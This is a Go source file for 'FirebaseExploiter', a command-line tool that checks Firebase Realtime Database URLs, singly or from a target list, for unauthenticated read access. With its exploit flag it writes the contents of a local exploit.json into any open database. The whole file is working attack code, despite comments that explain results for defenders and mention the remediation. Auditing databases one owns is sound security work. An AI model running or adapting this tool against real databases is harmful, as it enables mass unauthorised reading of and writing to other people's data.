firebaseExploiter.go
package main
import (
"bufio"
"encoding/json"
"errors"
"flag"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"github.com/fatih/color"
)
// banner is the ASCII-art title and version string that main prints once at
// startup, before any flag validation or network activity.
const banner = `
____ ___ _
/ __/ ___ ____ __ __ ____ ___ / _ ) (_) ___ ___ _ ____ __ __
_\ \ / -_)/ __// // / / __// -_) / _ | / / / _ \/ _ / / __/ / // /
/___/ \__/ \__/ \_,_/ /_/ \__/ /____/ /_/ /_//_/\_,_/ /_/ \_, /
/___/
FirebaseExploiter v1.0
`
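// checkJSON requests <url>/.json without credentials and reports whether the
// endpoint answers with HTTP 200.
//
// url is normalised first: surrounding whitespace is trimmed, "https://" is
// prepended when missing and a trailing "/" is appended. cmd selects the
// verbosity: only "standalone" prints a line for non-200 responses. When
// exploit is true and the probe returned 200, exploitJSON is called with path.
//
// Interpretation for defenders: a 200 here means the database rules returned
// data to an unauthenticated client at the root. A non-200 only says the root
// was not readable without credentials; rules are evaluated per path, so it is
// not proof that every child path is protected.
func checkJSON(url string, cmd string, exploit bool, path string) {
	url = strings.TrimSpace(url)
	if url == "" {
		// Blank lines in a target file would otherwise turn into "https:///".
		return
	}
	if !strings.HasPrefix(url, "https://") {
		url = "https://" + url
	}
	if !strings.HasSuffix(url, "/") {
		url += "/"
	}

	// NOTE(review): http.Get uses http.DefaultClient, which sets no timeout, so
	// one unresponsive host can stall a whole file-driven run. A shared
	// http.Client with a Timeout would fix that but needs a new import.
	resp, err := http.Get(url + ".json")
	if err != nil {
		color.Yellow("[-] Failed to connect " + url)
		return
	}
	// The body is never read, but it must still be closed so the connection
	// and its file descriptor are released.
	defer resp.Body.Close()

	if resp.StatusCode == http.StatusOK {
		color.Red("[+] " + url + " - Firebase Possibly Vulnerable")
		if exploit {
			exploitJSON(url, path)
		}
		return
	}
	if cmd == "standalone" {
		color.Yellow("[*] " + url + " - Firebase Not Vulnerable")
	}
}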
// isJSON reports whether s can be decoded by encoding/json into an untyped
// value. An empty string is not valid JSON.
func isJSON(s string) bool {
	var decoded interface{}
	if err := json.Unmarshal([]byte(s), &decoded); err != nil {
		return false
	}
	return true
}
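// exploitJSON sends the contents of the local file "exploit.json" as an
// unauthenticated HTTP POST to url+path+".json" and reports the outcome.
//
// url is expected to already end in "/" (checkJSON normalises it). The process
// exits with status -1 when exploit.json does not exist. Any other read error,
// or a payload that is not valid JSON, is reported and the function returns
// without sending anything, so a broken payload file never results in a write
// to the remote database.
//
// A 200 response means the database rules accepted a write from a client with
// no credentials at that path; the remediation on the owner's side is to
// restrict the write rules for it.
func exploitJSON(url string, path string) {
	// Read directly instead of Stat-then-Read: one filesystem access and no
	// window in which the file can vanish between the check and the read.
	fileContent, err := ioutil.ReadFile("exploit.json")
	if errors.Is(err, os.ErrNotExist) {
		color.Yellow("[-] File 'exploit.json' does not exist")
		os.Exit(-1)
	}
	if err != nil {
		color.Yellow("[-] Error reading file 'exploit.json'")
		return
	}

	str := string(fileContent)
	if !isJSON(str) {
		color.Yellow("[-] File 'exploit.json' is not in proper JSON format")
		return
	}

	target := url + path + ".json"
	resp, err := http.Post(target, "application/json", strings.NewReader(str))
	if err != nil {
		color.Yellow("[-] Failed to exploit " + target)
		return
	}
	// Close the unread body so the connection is released.
	defer resp.Body.Close()

	if resp.StatusCode == http.StatusOK {
		color.Green("[+] Exploited URL - " + target)
	} else {
		color.Yellow("[*] Exploited Failed For - " + target)
	}
}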
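// main parses the command-line flags, prints the banner and runs checkJSON
// either for the single -url target or for every line of the -file list.
//
// Flags:
//
//	-url      single target; takes precedence over -file when both are given
//	-file     path to a text file with one target per line
//	-exploit  after a 200 probe, also attempt the write in exploitJSON
//	-path     URI path used for that write (default "firebaseExploiter")
//
// With neither -url nor -file the flag defaults are printed and the process
// exits with status -1.
func main() {
	url := flag.String("url", "", "Target URL")
	file := flag.String("file", "", "File Path")
	exploit := flag.Bool("exploit", false, "Exploit")
	path := flag.String("path", "firebaseExploiter", "URI Path For Exploit")
	flag.Parse()

	fmt.Println(banner)

	if *url == "" && *file == "" {
		flag.PrintDefaults()
		os.Exit(-1)
	}

	if *url != "" {
		checkJSON(*url, "standalone", *exploit, *path)
		return
	}

	// Only -file was supplied.
	readFile, err := os.Open(*file)
	if err != nil {
		// Stop here: scanning a file that failed to open would silently
		// process zero targets and look like a clean run.
		fmt.Fprintln(os.Stderr, err)
		os.Exit(-1)
	}
	defer readFile.Close()

	fileScanner := bufio.NewScanner(readFile)
	fileScanner.Split(bufio.ScanLines)
	for fileScanner.Scan() {
		target := strings.TrimSpace(fileScanner.Text())
		if target == "" {
			continue // ignore blank lines in the target list
		}
		checkJSON(target, "file", *exploit, *path)
	}
	// Scan returns false on both EOF and error; surface the latter (for
	// example an over-long line) instead of ending the run quietly.
	if err := fileScanner.Err(); err != nil {
		fmt.Fprintln(os.Stderr, err)
	}
}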